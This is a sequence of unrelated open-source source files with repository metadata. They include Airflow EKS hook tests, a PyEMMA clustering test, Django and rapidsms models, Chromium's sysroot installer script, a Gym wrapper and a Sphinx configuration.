expected_arn_values: list = [
PARTITION,
REGION,
DEFAULT_ACCOUNT_ID,
generated_test_data.cluster_name,
generated_test_data.fargate_profile_names,
None,
]
assert_all_arn_values_are_valid(
expected_arn_values=expected_arn_values,
pattern=RegExTemplates.FARGATE_PROFILE_ARN,
arn_under_test=generated_test_data.fargate_describe_output[FargateProfileAttributes.ARN],
)
@freeze_time(FROZEN_TIME)
def test_create_fargate_profile_generates_valid_created_timestamp(self, fargate_profile_builder) -> None:
_, generated_test_data = fargate_profile_builder()
result_time: datetime = generated_test_data.fargate_describe_output[
FargateProfileAttributes.CREATED_AT
]
assert iso_date(result_time) == FROZEN_TIME
def test_create_fargate_profile_saves_provided_parameters(self, fargate_profile_builder) -> None:
_, generated_test_data = fargate_profile_builder(minimal=False)
for key, expected_value in generated_test_data.attributes_to_test:
assert generated_test_data.fargate_describe_output[key] == expected_value
def test_describe_fargate_profile_throws_exception_when_cluster_not_found(
self, fargate_profile_builder
) -> None:
eks_hook, generated_test_data = fargate_profile_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.describe_fargate_profile(
clusterName=generated_test_data.nonexistent_cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_describe_fargate_profile_throws_exception_when_profile_not_found(
self, fargate_profile_builder
) -> None:
client, generated_test_data = fargate_profile_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = FARGATE_PROFILE_NOT_FOUND_MSG.format(
fargateProfileName=generated_test_data.nonexistent_fargate_profile_name,
)
with pytest.raises(ClientError) as raised_exception:
client.describe_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.nonexistent_fargate_profile_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_fargate_profile_removes_deleted_fargate_profile(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(initial_batch_size)
eks_hook.delete_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
)
result_fargate_profile_list: list = eks_hook.list_fargate_profiles(
clusterName=generated_test_data.cluster_name
)
assert len(result_fargate_profile_list) == (initial_batch_size - 1)
assert generated_test_data.existing_fargate_profile_name not in result_fargate_profile_list
def test_delete_fargate_profile_returns_deleted_fargate_profile(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size, minimal=False)
result: dict = eks_hook.delete_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
)[ResponseAttributes.FARGATE_PROFILE]
for key, expected_value in generated_test_data.attributes_to_test:
assert result[key] == expected_value
def test_delete_fargate_profile_throws_exception_when_cluster_not_found(
self, fargate_profile_builder
) -> None:
eks_hook, generated_test_data = fargate_profile_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_fargate_profile(
clusterName=generated_test_data.nonexistent_cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_fargate_profile_throws_exception_when_fargate_profile_not_found(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = FARGATE_PROFILE_NOT_FOUND_MSG.format(
fargateProfileName=generated_test_data.nonexistent_fargate_profile_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.nonexistent_fargate_profile_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new Fargate profile was created.
fargate_profile_count_after_test: int = len(
eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
)
assert fargate_profile_count_after_test == initial_batch_size
# The following Selector test cases have all been verified against the AWS API using cURL.
selector_formatting_test_cases = [
# Format is ([Selector(s), expected_message, expected_result])
# Happy Paths
# Selector with a Namespace and no Labels
(
[{FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE}],
None,
PossibleTestResults.SUCCESS,
),
# Selector with a Namespace and an empty collection of Labels
(
[
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", 0),
}
],
None,
PossibleTestResults.SUCCESS,
),
# Selector with a Namespace and one valid Label
(
[
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", 1),
}
],
None,
PossibleTestResults.SUCCESS,
),
# Selector with a Namespace and the maximum number of Labels
(
[
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", MAX_FARGATE_LABELS),
}
],
None,
PossibleTestResults.SUCCESS,
),
# Two valid Selectors
(
[
{FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE},
{FargateProfileAttributes.NAMESPACE: f"{DEFAULT_NAMESPACE}_2"},
],
None,
PossibleTestResults.SUCCESS,
),
# Unhappy Cases
# No Selectors provided
([], FARGATE_PROFILE_NEEDS_SELECTOR_MSG, PossibleTestResults.FAILURE),
# Empty Selector / Selector without a Namespace or Labels
([{}], FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE, PossibleTestResults.FAILURE),
# Selector with labels but no Namespace
(
[{FargateProfileAttributes.LABELS: generate_dict("label", 1)}],
FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE,
PossibleTestResults.FAILURE,
),
# Selector with Namespace but too many Labels
(
[
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", MAX_FARGATE_LABELS + 1),
}
],
FARGATE_PROFILE_TOO_MANY_LABELS,
PossibleTestResults.FAILURE,
),
# Valid Selector followed by Empty Selector
(
[{FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE}, {}],
FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE,
PossibleTestResults.FAILURE,
),
# Empty Selector followed by Valid Selector
(
[{}, {FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE}],
FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE,
PossibleTestResults.FAILURE,
),
# Empty Selector followed by Empty Selector
([{}, {}], FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE, PossibleTestResults.FAILURE),
# Valid Selector followed by Selector with Namespace but too many Labels
(
[
{FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE},
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", MAX_FARGATE_LABELS + 1),
},
],
FARGATE_PROFILE_TOO_MANY_LABELS,
PossibleTestResults.FAILURE,
),
]
@pytest.mark.parametrize(
"selectors, expected_message, expected_result",
selector_formatting_test_cases,
)
@mock_eks
def test_create_fargate_selectors(self, cluster_builder, selectors, expected_message, expected_result):
client, generated_test_data = cluster_builder()
cluster_name: str = generated_test_data.existing_cluster_name
fargate_profile_name: str = NON_EXISTING_FARGATE_PROFILE_NAME
expected_exception: type[AWSError] = InvalidParameterException
test_inputs = dict(
deepcopy(
# Required Constants
[POD_EXECUTION_ROLE_ARN]
# Required Variables
+ [
(ClusterAttributes.CLUSTER_NAME, cluster_name),
(FargateProfileAttributes.FARGATE_PROFILE_NAME, fargate_profile_name),
]
# Test Case Values
+ [(FargateProfileAttributes.SELECTORS, selectors)]
)
)
if expected_result == PossibleTestResults.SUCCESS:
result: list = client.create_fargate_profile(**test_inputs)[ResponseAttributes.FARGATE_PROFILE]
for key, expected_value in test_inputs.items():
assert result[key] == expected_value
else:
with pytest.raises(ClientError) as raised_exception:
client.create_fargate_profile(**test_inputs)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_message,
raised_exception=raised_exception,
)
class TestEksHook:
@mock.patch("airflow.providers.amazon.aws.hooks.base_aws.AwsBaseHook.conn")
@pytest.mark.parametrize(
"aws_conn_id, region_name, expected_args",
[
[
"test-id",
"test-region",
[
"-m",
"airflow.providers.amazon.aws.utils.eks_get_token",
"--region-name",
"test-region",
"--aws-conn-id",
"test-id",
"--cluster-name",
"test-cluster",
],
],
[
None,
"test-region",
[
"-m",
"airflow.providers.amazon.aws.utils.eks_get_token",
"--region-name",
"test-region",
"--cluster-name",
"test-cluster",
],
],
[
None,
None,
["-m", "airflow.providers.amazon.aws.utils.eks_get_token", "--cluster-name", "test-cluster"],
],
],
)
def test_generate_config_file(self, mock_conn, aws_conn_id, region_name, expected_args):
mock_conn.describe_cluster.return_value = {
"cluster": {"certificateAuthority": {"data": "test-cert"}, "endpoint": "test-endpoint"}
}
hook = EksHook(aws_conn_id=aws_conn_id, region_name=region_name)
# We're mocking all actual AWS calls and don't need a connection. This
# avoids an Airflow warning about connection cannot be found.
hook.get_connection = lambda _: None
with hook.generate_config_file(
eks_cluster_name="test-cluster", pod_namespace="k8s-namespace"
) as config_file:
config = yaml.safe_load(Path(config_file).read_text())
assert config == {
"apiVersion": "v1",
"kind": "Config",
"clusters": [
{
"cluster": {"server": "test-endpoint", "certificate-authority-data": "test-cert"},
"name": "test-cluster",
}
],
"contexts": [
{
"context": {"cluster": "test-cluster", "namespace": "k8s-namespace", "user": "aws"},
"name": "aws",
}
],
"current-context": "aws",
"preferences": {},
"users": [
{
"name": "aws",
"user": {
"exec": {
"apiVersion": "client.authentication.k8s.io/v1alpha1",
"args": expected_args,
"command": sys.executable,
"env": [{"name": "AIRFLOW__LOGGING__LOGGING_LEVEL", "value": "FATAL"}],
"interactiveMode": "Never",
}
},
}
],
}
@mock.patch("airflow.providers.amazon.aws.hooks.eks.RequestSigner")
@mock.patch("airflow.providers.amazon.aws.hooks.base_aws.AwsBaseHook.conn")
@mock.patch("airflow.providers.amazon.aws.hooks.base_aws.AwsBaseHook.get_session")
def test_fetch_access_token_for_cluster(self, mock_get_session, mock_conn, mock_signer):
mock_signer.return_value.generate_presigned_url.return_value = "http://example.com"
mock_get_session.return_value.region_name = "us-east-1"
hook = EksHook()
token = hook.fetch_access_token_for_cluster(eks_cluster_name="test-cluster")
mock_signer.assert_called_once_with(
service_id=mock_conn.meta.service_model.service_id,
region_name="us-east-1",
signing_name="sts",
signature_version="v4",
credentials=mock_get_session.return_value.get_credentials.return_value,
event_emitter=mock_get_session.return_value.events,
)
mock_signer.return_value.generate_presigned_url.assert_called_once_with(
request_dict={
"method": "GET",
"url": "https://sts.us-east-1.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15",
"body": {},
"headers": {"x-k8s-aws-id": "test-cluster"},
"context": {},
},
region_name="us-east-1",
expires_in=60,
operation_name="",
)
assert token == "k8s-aws-v1.aHR0cDovL2V4YW1wbGUuY29t"
# Helper methods for repeated assert combinations.
def assert_all_arn_values_are_valid(expected_arn_values, pattern, arn_under_test) -> None:
"""
Applies regex `pattern` to `arn_under_test` and asserts
that each group matches the provided expected value.
A list entry of None in the 'expected_arn_values' will
assert that the value exists but not match a specific value.
"""
findall: list = pattern.findall(arn_under_test)[0]
# findall() returns a list of matches from right to left so it must be reversed
# in order to match the logical order of the 'expected_arn_values' list.
for value in reversed(findall):
expected_value = expected_arn_values.pop()
if expected_value:
assert value in expected_value
else:
assert value
assert region_matches_partition(findall[1], findall[0])
def assert_client_error_exception_thrown(
expected_exception: type[AWSError], expected_msg: str, raised_exception: ExceptionInfo
) -> None:
"""
Asserts that the raised exception is of the expected type
and the resulting message matches the expected format.
"""
response = raised_exception.value.response[ErrorAttributes.ERROR]
assert response[ErrorAttributes.CODE] == expected_exception.TYPE
assert response[ErrorAttributes.MESSAGE] == expected_msg
def assert_result_matches_expected_list(
result: list, expected_result: list, expected_len: int | None = None
) -> None:
assert result == expected_result
assert len(result) == expected_len or len(expected_result)
def assert_is_valid_uri(value: str) -> None:
result: ParseResult = urlsplit(value)
assert all([result.scheme, result.netloc, result.path])
assert REGION in value
|
{
"content_hash": "478935aa2f0f9cc429564f4c0ea73cc8",
"timestamp": "",
"source": "github",
"line_count": 1336,
"max_line_length": 110,
"avg_line_length": 42.92814371257485,
"alnum_prop": 0.6420351513460734,
"repo_name": "apache/airflow",
"id": "3d3e51f94acf7a42a50f15741deadcc985f0b246",
"size": "58139",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "tests/providers/amazon/aws/hooks/test_eks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "71458"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "172957"
},
{
"name": "JavaScript",
"bytes": "143915"
},
{
"name": "Jinja",
"bytes": "38911"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "23697738"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "211306"
},
{
"name": "TypeScript",
"bytes": "521019"
}
],
"symlink_target": ""
}
|
"""
Test the save_trajs function of the coordinates API by comparing
the direct, sequential retrieval of frames via mdtraj.load_frame() vs
the retrival via save_trajs
@author: gph82, clonker
"""
import unittest
import numpy as np
import pyemma.coordinates as coor
class TestClusterSamples(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(TestClusterSamples, cls).setUpClass()
def setUp(self):
self.input_trajs = [[0,1,2],
[3,4,5],
[6,7,8],
[0,1,2],
[3,4,5],
[6,7,8]]
self.cluster_obj = coor.cluster_regspace(data=self.input_trajs, dmin=.5)
def test_index_states(self):
# Test that the catalogue is being set up properly
# The assingment-catalogue is easy to see from the above dtrajs
ref = [[[0,0],[3,0]], # appearances of the 1st cluster
[[0,1],[3,1]], # appearances of the 2nd cluster
[[0,2],[3,2]], # appearances of the 3rd cluster
[[1,0],[4,0]], # .....
[[1,1],[4,1]],
[[1,2],[4,2]],
[[2,0],[5,0]],
[[2,1],[5,1]],
[[2,2],[5,2]],
]
for cc in np.arange(self.cluster_obj.n_clusters):
assert np.allclose(self.cluster_obj.index_clusters[cc], ref[cc])
def test_sample_indexes_by_state(self):
samples = self.cluster_obj.sample_indexes_by_cluster(np.arange(self.cluster_obj.n_clusters), 10)
# For each sample, check that you're actually retrieving the i-th center
for ii, isample in enumerate(samples):
assert np.in1d([self.cluster_obj.dtrajs[pair[0]][pair[1]] for pair in isample],ii).all()
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "644cdb9ef3ef6c7922d6a254d43aa3f7",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 104,
"avg_line_length": 34.425925925925924,
"alnum_prop": 0.5422270037654653,
"repo_name": "arokem/PyEMMA",
"id": "f224ea844bb23cfab3637c45537df49cf44e8b9a",
"size": "3273",
"binary": false,
"copies": "2",
"ref": "refs/heads/devel",
"path": "pyemma/coordinates/tests/test_cluster_samples.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "39352"
},
{
"name": "Python",
"bytes": "1138398"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import datetime
from django.db import models
from healthcare.api import client
from healthcare.exceptions import PatientDoesNotExist, ProviderDoesNotExist
class Report(models.Model):
"""An abstract model describing the structure of a 1000 days report."""
# Meta data.
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
active = models.BooleanField(default=True)
# Information about the IncomingMessage from which the report was received.
# If the report was not generated via SMS, then these fields will be
# empty.
raw_text = models.CharField(max_length=255, null=True, blank=True)
connection = models.ForeignKey('rapidsms.Connection', null=True, blank=True)
# Global identifiers, created by rapidsms-healthcare.
global_provider_id = models.CharField(max_length=255, null=True, blank=True)
global_patient_id = models.CharField(max_length=255, null=True, blank=True)
# In the near future, we will want to incorporate the rapidsms facilities registry.
# The date of the event that the report describes.
data_date = models.DateField(null=True, blank=True, default=datetime.date.today)
class Meta:
abstract = True
ordering = ['-data_date']
def __unicode__(self):
return 'Report created {0}'.format(self.created.date())
def cancel(self, save=True):
"""Cancels this report if it is currently active."""
self.active=False
if save:
self.save()
@property
def patient(self):
"""Retrieves the patient record associated with this report.
This method returns None if self.global_patient_id is None, or if no
patient exists with the identifier self.global_patient_id.
"""
if not hasattr(self, '_patient'):
if not self.global_patient_id:
self._patient = None
else:
try:
self._patient = client.patients.get(self.global_patient_id)
except PatientDoesNotExist:
self._patient = None
return self._patient
@property
def provider(self):
"""Retrieves the provider record associated with this report.
This method returns None if self.global_provider_id is None, or if no
provider exists with the identifier self.global_provider_id.
"""
if not hasattr(self, '_provider'):
if not self.global_provider_id:
self._provider = None
else:
try:
self._provider = client.providers.get(self.global_provider_id)
except ProviderDoesNotExist:
self._provider = None
return self._provider
|
{
"content_hash": "67d36b629c4482f07c82930b9cc105e2",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 87,
"avg_line_length": 36.63636363636363,
"alnum_prop": 0.6440978376462247,
"repo_name": "caktus/rapidsms-reports",
"id": "95557b9fe2868024e4d0bcd72aa48ccd86d151c0",
"size": "2821",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reports/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "4871"
}
],
"symlink_target": ""
}
|
"""Install Debian sysroots for building chromium.
"""
# The sysroot is needed to ensure that binaries that get built will run on
# the oldest stable version of Debian that we currently support.
# This script can be run manually but is more often run as part of gclient
# hooks. When run from hooks this script is a no-op on non-linux platforms.
# The sysroot image could be constructed from scratch based on the current state
# of the Debian archive but for consistency we use a pre-built root image (we
# don't want upstream changes to Debian to effect the chromium build until we
# choose to pull them in). The images will normally need to be rebuilt every
# time chrome's build dependencies are changed but should also be updated
# periodically to include upstream security fixes from Debian.
import hashlib
import json
import platform
import optparse
import os
import re
import shutil
import subprocess
import sys
try:
# For Python 3.0 and later
from urllib.request import urlopen
except ImportError:
# Fall back to Python 2's urllib2
from urllib.request import urlopen
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
URL_PREFIX = 'https://commondatastorage.googleapis.com'
URL_PATH = 'chrome-linux-sysroot/toolchain'
VALID_ARCHS = ('arm', 'arm64', 'i386', 'amd64')
ARCH_TRANSLATIONS = {
'x64': 'amd64',
'x86': 'i386',
}
DEFAULT_TARGET_PLATFORM = 'sid'
class Error(Exception):
pass
def GetSha1(filename):
sha1 = hashlib.sha1()
with open(filename, 'rb') as f:
while True:
# Read in 1mb chunks, so it doesn't all have to be loaded into memory.
chunk = f.read(1024*1024)
if not chunk:
break
sha1.update(chunk)
return sha1.hexdigest()
def main(args):
parser = optparse.OptionParser('usage: %prog [OPTIONS]', description=__doc__)
parser.add_option('--arch',
help='Sysroot architecture: %s' % ', '.join(VALID_ARCHS))
parser.add_option('--all', action='store_true',
help='Install all sysroot images (useful when updating the'
' images)')
parser.add_option('--print-hash',
help='Print the hash of the sysroot for the given arch.')
options, _ = parser.parse_args(args)
if not sys.platform.startswith('linux'):
return 0
if options.print_hash:
arch = options.print_hash
print(GetSysrootDict(DEFAULT_TARGET_PLATFORM,
ARCH_TRANSLATIONS.get(arch, arch))['Sha1Sum'])
return 0
if options.arch:
InstallSysroot(DEFAULT_TARGET_PLATFORM,
ARCH_TRANSLATIONS.get(options.arch, options.arch))
elif options.all:
for arch in VALID_ARCHS:
InstallSysroot(DEFAULT_TARGET_PLATFORM, arch)
else:
print('You much specify one of the options.')
return 1
return 0
def GetSysrootDict(target_platform, target_arch):
if target_arch not in VALID_ARCHS:
raise Error('Unknown architecture: %s' % target_arch)
sysroots_file = os.path.join(SCRIPT_DIR, 'sysroots.json')
sysroots = json.load(open(sysroots_file))
sysroot_key = '%s_%s' % (target_platform, target_arch)
if sysroot_key not in sysroots:
raise Error('No sysroot for: %s %s' % (target_platform, target_arch))
return sysroots[sysroot_key]
def InstallSysroot(target_platform, target_arch):
sysroot_dict = GetSysrootDict(target_platform, target_arch)
tarball_filename = sysroot_dict['Tarball']
tarball_sha1sum = sysroot_dict['Sha1Sum']
# TODO(thestig) Consider putting this elsewhere to avoid having to recreate
# it on every build.
linux_dir = os.path.dirname(SCRIPT_DIR)
sysroot = os.path.join(linux_dir, sysroot_dict['SysrootDir'])
url = '%s/%s/%s/%s' % (URL_PREFIX, URL_PATH, tarball_sha1sum,
tarball_filename)
stamp = os.path.join(sysroot, '.stamp')
if os.path.exists(stamp):
with open(stamp) as s:
if s.read() == url:
return
print('Installing Debian %s %s root image: %s' % \
(target_platform, target_arch, sysroot))
if os.path.isdir(sysroot):
shutil.rmtree(sysroot)
os.mkdir(sysroot)
tarball = os.path.join(sysroot, tarball_filename)
print('Downloading %s' % url)
sys.stdout.flush()
sys.stderr.flush()
for _ in range(3):
try:
response = urlopen(url)
with open(tarball, "wb") as f:
f.write(response.read())
break
except Exception: # Ignore exceptions.
pass
else:
raise Error('Failed to download %s' % url)
sha1sum = GetSha1(tarball)
if sha1sum != tarball_sha1sum:
raise Error('Tarball sha1sum is wrong.'
'Expected %s, actual: %s' % (tarball_sha1sum, sha1sum))
subprocess.check_call(['tar', 'xf', tarball, '-C', sysroot])
os.remove(tarball)
with open(stamp, 'w') as s:
s.write(url)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except Error as e:
sys.stderr.write(str(e) + '\n')
sys.exit(1)
|
{
"content_hash": "3967d06d9dea8b8a2d92063e6442f3db",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 80,
"avg_line_length": 30.7875,
"alnum_prop": 0.669305724725944,
"repo_name": "flutter/buildroot",
"id": "d3e76649e6524dcb9f98b480f08f56d747aba865",
"size": "5118",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "build/linux/sysroot_scripts/install-sysroot.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "507"
},
{
"name": "C++",
"bytes": "30195"
},
{
"name": "Python",
"bytes": "291265"
},
{
"name": "Shell",
"bytes": "85178"
},
{
"name": "sed",
"bytes": "1677"
}
],
"symlink_target": ""
}
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from cms.models import CMSPlugin, Page
from cms.models.fields import PageField
class Link(CMSPlugin):
"""
A link to an other page or to an external website
"""
name = models.CharField(_("name"), max_length=256)
url = models.URLField(_("link"), blank=True, null=True)
page_link = PageField(
verbose_name=_("page"),
help_text=_("A link to a page has priority over a text link."),
on_delete=models.SET_NULL,
blank=True, null=True)
#page_link = models.ForeignKey(Page, verbose_name=_("page"), blank=True, null=True, help_text=_("A link to a page has priority over a text link."), on_delete=models.SET_NULL)
additional_params = models.CharField(_("additional parameters"), max_length=300, blank=True, null=True)
mailto = models.EmailField(_("mailto"), blank=True, null=True, help_text=_("An email adress has priority over a text link."))
phone = models.CharField(_('Phone'), blank=True, null=True, max_length=40,
help_text=_('A phone number has priority over a mailto link.'))
css = models.CharField(_('CSS Classes'),
default=u'',
blank=True, max_length=100)
target = models.CharField(_("target"), blank=True, max_length=100, choices=((
("", _("same window")),
("_blank", _("new window")),
("_parent", _("parent window")),
("_top", _("topmost frame")),
)))
def link(self):
if self.phone:
link = u"tel://%s" % self.phone
elif self.mailto:
link = u"mailto:%s" % self.mailto
elif self.page_link:
link = self.page_link.get_absolute_url()
if self.additional_params:
link += self.additional_params
elif self.url:
link = self.url
else:
link = ""
return link
def __unicode__(self):
return self.name
search_fields = ('name',)
|
{
"content_hash": "66e329247e517a23ed511baf4fac06c6",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 178,
"avg_line_length": 38.92307692307692,
"alnum_prop": 0.5904150197628458,
"repo_name": "kohout/djangocms-link",
"id": "696f27d275a5957008f0e105c768ff96d6b14151",
"size": "2024",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "djangocms_link/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "350"
},
{
"name": "Python",
"bytes": "49411"
}
],
"symlink_target": ""
}
|
"""Gym utilities."""
from typing import Any
from acme import wrappers
import gym
from rlds_creator import environment
from rlds_creator import gym_renderer
class InfoWrapper(gym.Wrapper):
"""Wrapper that provides access to the information of the last step."""
def __init__(self, env):
super().__init__(env)
self._step_info = None
def reset(self):
self._step_info = None
return super().reset()
def step(self, action):
observation, reward, done, info = super().step(action)
self._step_info = info
return observation, reward, done, info
def step_info(self) -> Any:
"""Returns the auxiliary information of the last step."""
return self._step_info
class GymEnvironment(environment.Environment):
"""An Environment that is backed by a Gym Env."""
def __init__(self, env: gym.Env):
# We wrap the Gym environment to access the step info.
self._gym_env = InfoWrapper(env)
self._env = wrappers.gym_wrapper.GymWrapper(self._gym_env)
self._renderer = gym_renderer.GymRenderer(self._gym_env)
def env(self) -> environment.DMEnv:
return self._env
def render(self) -> environment.Image:
return self._renderer.render()
def step_info(self) -> Any:
return self._gym_env.step_info()
|
{
"content_hash": "835de71f1bd81c1c501274d776711a1e",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 73,
"avg_line_length": 26.25,
"alnum_prop": 0.6817460317460318,
"repo_name": "google-research/rlds-creator",
"id": "0e6bfe7dfa48b4e75f8d087318eab560119e8417",
"size": "1860",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "rlds_creator/gym_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
import sys, os
sys.path.append('../')
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'BatchOpenMPI'
copyright = u'2009, Antoine Dymond'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.2'
# The full version, including alpha/beta/rc tags.
release = '0.2.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'BatchOpenMPIdoc'
# -- Options for LaTeX output --------------------------------------------------
